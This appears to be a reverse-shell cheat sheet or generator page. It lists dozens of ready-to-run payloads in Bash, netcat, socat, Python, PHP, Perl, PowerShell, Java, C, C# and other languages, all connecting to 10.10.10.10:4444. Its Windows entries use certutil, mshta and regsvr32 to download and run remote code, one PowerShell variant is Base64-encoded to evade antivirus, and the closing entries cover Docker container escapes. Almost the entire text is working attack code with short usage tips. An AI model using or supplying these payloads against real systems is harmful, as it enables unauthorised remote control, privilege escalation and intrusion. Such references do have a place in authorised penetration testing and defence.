Bash
Bash -i
Classic bash reverse shell using /dev/tcp pseudo-device
LINUXOSX
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
Bash 196
Uses file descriptor 196 — good for restricted environments
LINUXOSX
0<&196;exec 196<>/dev/tcp/10.10.10.10/4444; sh <&196 >&196 2>&196
Bash Read Line
Reads commands line by line over TCP
LINUXOSX
exec 5<>/dev/tcp/10.10.10.10/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
Bash FD 5
Uses file descriptor 5 bidirectionally
LINUXOSX
bash -i 5<> /dev/tcp/10.10.10.10/4444 0<&5 1>&5 2>&5
Bash UDP
UDP reverse shell — bypasses TCP-only firewalls (listener: nc -u -lvnp {$p})
LINUXOSX
sh -i >& /dev/udp/10.10.10.10/4444 0>&1
Bash 1-liner 2
Wrapped in bash -c for injection contexts
LINUXOSX
bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Bash Subshell
Forks into background — shell survives parent process exit
LINUXOSX
(bash -i >& /dev/tcp/10.10.10.10/4444 0>&1) &
Zsh
Zsh
Zsh native TCP socket module
LINUXOSX
zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
sh
sh -i
POSIX sh variant — works when bash is unavailable
LINUXOSX
sh -i >& /dev/tcp/10.10.10.10/4444 0>&1
dash
Dash — default /bin/sh on Debian/Ubuntu
LINUX
dash -i >& /dev/tcp/10.10.10.10/4444 0>&1
ksh
KornShell reverse shell
LINUXOSX
ksh -c 'ksh -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Fish
Fish shell wrapping bash /dev/tcp
LINUXOSX
fish -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Netcat
nc mkfifo
Most compatible nc payload — uses named pipe, no -e flag needed
LINUXOSX
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f
nc -e /bin/sh
Classic nc -e (requires -e capable netcat: traditional/openbsd)
LINUXOSX
nc -e /bin/sh 10.10.10.10 4444
nc -e /bin/bash
Same as above but spawns bash specifically
LINUXOSX
nc -e /bin/bash 10.10.10.10 4444
nc -c sh
-c flag variant for netcat-traditional
LINUXOSX
nc -c sh 10.10.10.10 4444
nc UDP
UDP variant — needs: nc -u -lvnp {$p} on listener
LINUXOSX
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc -u 10.10.10.10 4444 >/tmp/f
Ncat
ncat
Ncat (nmap toolkit) with -e flag
LINUXOSX
ncat 10.10.10.10 4444 -e /bin/bash
ncat UDP
Ncat UDP variant
LINUXOSX
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|ncat -u 10.10.10.10 4444 >/tmp/f
ncat SSL
Encrypted SSL shell — listener: ncat --ssl -lvnp {$p}
LINUXOSX
ncat --ssl 10.10.10.10 4444 -e /bin/bash
Socat
socat basic
Basic socat reverse shell
LINUXOSX
socat TCP:10.10.10.10:4444 EXEC:sh
socat TTY
Full interactive TTY — best socat shell
LINUXOSX
socat TCP:10.10.10.10:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane
socat SSL
SSL encrypted socat shell — requires cert on listener
LINUXOSX
# Listener:
socat OPENSSL-LISTEN:4444,cert=shell.pem,cafile=shell.pem,fork STDOUT
# Target:
socat OPENSSL:10.10.10.10:4444,verify=0 EXEC:'/bin/bash -li',pty,stderr,setsid
socat UDP
UDP socat shell
LINUXOSX
socat UDP:10.10.10.10:4444 EXEC:bash,pty,stderr,setsid
Python
Python 2
Python 2 reverse shell with pty spawn
LINUXOSXWINDOWS
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/sh")'
Python 3
Python 3 reverse shell
LINUXOSX
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/sh")'
Python 3 Short
Shortest python3 variant
LINUXOSX
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.10.10",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
Python 3 Thread
Threaded variant for unstable connections
LINUXOSX
python3 -c 'import socket,os,pty,threading;s=socket.socket();s.connect(("10.10.10.10",4444));p=pty.fork();os.execvp("bash",["bash"])if p==0 else os.dup2(s.fileno(),t)for t in[0,1,2]'
Python Windows
Python reverse shell spawning cmd.exe on Windows
WINDOWS
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));subprocess.call(["cmd.exe"],stdin=s,stdout=s,stderr=s)'
PHP
PHP PentestMonkey
PentestMonkey classic — uses exec with fd 3
LINUXOSX
php -r '$sock=fsockopen("10.10.10.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
PHP proc_open
Uses proc_open for bidirectional I/O
LINUXOSXWINDOWS
php -r '$sock=fsockopen("10.10.10.10",4444);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
PHP shell_exec
Web-based shell_exec payload
LINUXOSX
<?php shell_exec("bash -i >& /dev/tcp/10.10.10.10/4444 0>&1");?>
PHP passthru
Uses passthru() — slightly different execution context
LINUXOSX
<?php passthru("bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'");?>
PHP system
system() variant
LINUXOSX
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'");?>
PHP backtick
Backtick operator (alias for shell_exec)
LINUXOSX
<?php $x=`bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'`;?>
PHP popen
popen() variant
LINUXOSX
<?php $h=popen("bash -i >& /dev/tcp/10.10.10.10/4444 0>&1","r");pclose($h);?>
PHP pcntl_exec
Uses pcntl_exec — requires pcntl extension
LINUXOSX
<?php $sock=fsockopen("10.10.10.10",4444);pcntl_exec("/bin/sh",array("-i"),array(0=>$sock,1=>$sock,2=>$sock));?>
Perl
Perl Socket
Classic Perl socket reverse shell
LINUXOSX
perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl No sh
Uses IO::Socket — no /bin/sh required in command
LINUXOSX
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Perl IO::Socket
IO::Socket variant with exec
LINUXOSX
perl -MIO::Socket -e '$s=new IO::Socket::INET(PeerHost=>"10.10.10.10",PeerPort=>4444,Proto=>"tcp");STDIN->fdopen($s,r);$~->fdopen($s,w);exec{"/bin/sh"}"/bin/sh","-i"'
Ruby
Ruby TCPSocket
Ruby socket with exec sprintf
LINUXOSX
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Ruby No sh
Forks to background, reads commands via popen
LINUXOSX
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.10.10","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Go
Go Linux
Go reverse shell (cross-platform)
LINUXOSX
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.10.10.10:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/s.go && go run /tmp/s.go
Go Windows
Go reverse shell — cmd.exe on Windows
WINDOWS
echo package main > s.go && echo import( >> s.go && echo "net" >> s.go && echo "os/exec" >> s.go && echo ) >> s.go && echo func main(){ >> s.go && echo c,_:=net.Dial("tcp","10.10.10.10:4444") >> s.go && echo cmd:=exec.Command("cmd.exe") >> s.go && echo cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()} >> s.go && go run s.go
Java
Java Runtime
Java Runtime.exec() — useful in RCE contexts
LINUXOSX
Runtime r=Runtime.getRuntime();
String[] cmd={"/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/4444;cat <&5|while read l;do $l 2>&5>&5;done"};
Process p=r.exec(cmd);
Java Thread
Java threaded shell — compile & run
LINUXOSXWINDOWS
public class S extends Thread{public void run(){try{String[] c=new String[]{"/bin/sh","-i"};ProcessBuilder pb=new ProcessBuilder(c);pb.redirectErrorStream(true);Process p=pb.start();java.net.Socket s=new java.net.Socket("10.10.10.10",4444);java.io.InputStream is=p.getInputStream();java.io.OutputStream os=s.getOutputStream();int b;while((b=is.read())!=-1){os.write(b);os.flush();}p.waitFor();}catch(Exception e){}}}
new S().start();
Java ScriptEngine
Java ScriptEngine / JNDI injection context
LINUXOSX
String[] cmd=new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"};
Runtime.getRuntime().exec(cmd);
Java Groovy
Groovy one-liner (Jenkins Script Console etc.)
LINUXOSX
String cmd = "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1";
["bash","-c",cmd].execute()
Node.js
Node.js
Node.js child_process + net socket
LINUXOSXWINDOWS
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);var c=new net.Socket();c.connect(4444,"10.10.10.10",function(){c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});return /a/;})();
Node.js Windows
Same but spawns cmd.exe on Windows
WINDOWS
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("cmd.exe",[]);var c=new net.Socket();c.connect(4444,"10.10.10.10",function(){c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});return /a/;})();
Node.js Exec
Minimal Node.js — one-liner exec injection
LINUXOSX
require('child_process').exec('bash -i >& /dev/tcp/10.10.10.10/4444 0>&1');
PowerShell
PowerShell #1
Full PowerShell reverse shell with prompt
WINDOWS
powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PowerShell #2
Hidden window PowerShell — good for evasion
WINDOWS
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient=New-Object Net.Sockets.TCPClient('10.10.10.10',4444);$NS=$TCPClient.GetStream();$SW=New-Object IO.StreamWriter($NS);$SW.AutoFlush=$true;$Buffer=New-Object System.Byte[] 1024;$Enc=New-Object System.Text.ASCIIEncoding;while($TCPClient.Connected){while($NS.DataAvailable){$RD=$NS.Read($Buffer,0,$Buffer.Length);$Code=$Enc.GetString($Buffer,0,$RD)};if($TCPClient.Connected -and $Code.Length -gt 1){$Output=try{Invoke-Expression($Code) 2>&1}catch{$_};$SW.Write("$Output\`n");$Code=$null}}"
PowerShell Base64
Base64 encoded PowerShell — bypasses simple AV string detection
WINDOWS
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAAgADQANAA0ADQAKQA7AA==
Windows
cmd.exe nc
cmd.exe via netcat (requires nc.exe on target)
WINDOWS
cmd.exe /c nc.exe 10.10.10.10 4444 -e cmd.exe
cmd.exe certutil
Downloads nc.exe via certutil then reverses — LOLBins technique
WINDOWS
certutil -urlcache -split -f http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe && C:\Windows\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe
WMIC shell
Launch via WMIC process creation — good for lateral movement
WINDOWS
wmic process call create "cmd.exe /c nc.exe 10.10.10.10 4444 -e cmd.exe"
mshta
LOLBin — host a .hta containing VBScript reverse shell
WINDOWS
mshta http://10.10.10.10/shell.hta
regsvr32
Squiblydoo — executes remote .sct scriptlet via scrobj.dll
WINDOWS
regsvr32 /s /n /u /i:http://10.10.10.10/shell.sct scrobj.dll
rundll32
LOLBin via rundll32 JScript execution
WINDOWS
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new ActiveXObject("WScript.Shell");h.run("cmd /c nc.exe 10.10.10.10 4444 -e cmd.exe");
C/C++
C Linux
Compile: gcc shell.c -o shell && ./shell
LINUX
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
int main(void){
int s=socket(AF_INET,SOCK_STREAM,0);
struct sockaddr_in sa;
sa.sin_family=AF_INET;
sa.sin_port=htons(4444);
inet_aton("10.10.10.10",&sa.sin_addr);
connect(s,(struct sockaddr*)&sa,sizeof(sa));
dup2(s,0);dup2(s,1);dup2(s,2);
execve("/bin/sh",NULL,NULL);
}
C++ Windows
C++ Windows shell — compile: cl shell.cpp /link ws2_32.lib
WINDOWS
#include<winsock2.h>
#include<windows.h>
#pragma comment(lib,"ws2_32")
int main(){
WSADATA wd;
WSAStartup(MAKEWORD(2,2),&wd);
SOCKET s=WSASocket(AF_INET,SOCK_STREAM,0,NULL,0,0);
SOCKADDR_IN sa;
sa.sin_family=AF_INET;
sa.sin_port=htons(4444);
sa.sin_addr.s_addr=inet_addr("10.10.10.10");
WSAConnect(s,(SOCKADDR*)&sa,sizeof(sa),0,0,0,0);
STARTUPINFO si={0};
si.cb=sizeof(si);si.dwFlags=STARTF_USESTDHANDLES;
si.hStdInput=si.hStdOutput=si.hStdError=(HANDLE)s;
PROCESS_INFORMATION pi;
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
}
C#
C# TcpClient
C# TcpClient — compile: csc shell.cs && shell.exe
WINDOWS
using System;
using System.Net;
using System.Net.Sockets;
using System.Diagnostics;
class S{
static void Main(){
TcpClient c=new TcpClient("10.10.10.10",4444);
NetworkStream s=c.GetStream();
ProcessStartInfo pi=new ProcessStartInfo("cmd.exe");
pi.UseShellExecute=false;
pi.RedirectStandardInput=true;
pi.RedirectStandardOutput=true;
pi.RedirectStandardError=true;
Process p=Process.Start(pi);
p.StandardInput.BaseStream.CopyTo(s);
s.CopyTo(p.StandardInput.BaseStream);
}
}
Telnet
Telnet
Telnet via named pipe
LINUXOSX
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.10.10 4444 0<$TF | sh 1>$TF
Telnet 2-conn
Two-connection telnet — stdin on {$p}, stdout on 4445
LINUXOSX
# On attacker — start 2 listeners:
nc -lvnp 4444
nc -lvnp $((p+1))
# On target:
telnet 10.10.10.10 4444 | /bin/bash | telnet 10.10.10.10 $((p+1))
Awk
Awk
Awk native /inet/tcp support — no external tools
LINUXOSX
awk 'BEGIN {s = "/inet/tcp/0/10.10.10.10/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/stdin
Lua
Lua
Lua socket library reverse shell
LINUXOSX
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.10.10','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Lua5.1
Lua 5.1 specific
LINUXOSX
lua5.1 -e 'local s=require("socket");local t=assert(s.tcp());t:connect("10.10.10.10",4444);while true do local r,x=t:receive();local f=assert(io.popen(r,"r"));local b=assert(f:read("*a"));t:send(b);end;f:close();t:close();'
Tcl
Tcl
Tcl event-driven socket shell
LINUXOSX
echo 'set s [socket 10.10.10.10 4444];fconfigure $s -translation binary -buffering full;set p [open "|bash -i" r+];fconfigure $p -translation binary -buffering full;fileevent $s readable {puts -nonewline $p [read $s];flush $p};fileevent $p readable {puts -nonewline $s [read $p];flush $s};vwait _' | tclsh
OpenSSL
OpenSSL
Encrypted reverse shell — traffic looks like TLS
LINUXOSX
# --- ATTACKER (run these first) ---
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/CN=localhost"
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
# --- TARGET ---
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.10.10:4444 > /tmp/s; rm /tmp/s
Docker
Docker breakout
Docker socket privilege escalation → host reverse shell
LINUX
# If you have access to the Docker socket:
docker run -it --rm --privileged -v /:/hostfs alpine chroot /hostfs /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Docker cgroup
Container escape via cgroup release_agent (privileged containers)
LINUX
# Container escape via cgroup release_agent:
mkdir /tmp/cg && mount -t cgroup -o rdma cgroup /tmp/cg
mkdir /tmp/cg/x
echo 1 > /tmp/cg/x/notify_on_release
host_path=\`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab\`
echo "$host_path/cmd" > /tmp/cg/release_agent
echo '#!/bin/sh' > /cmd
echo "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cg/x/cgroup.procs"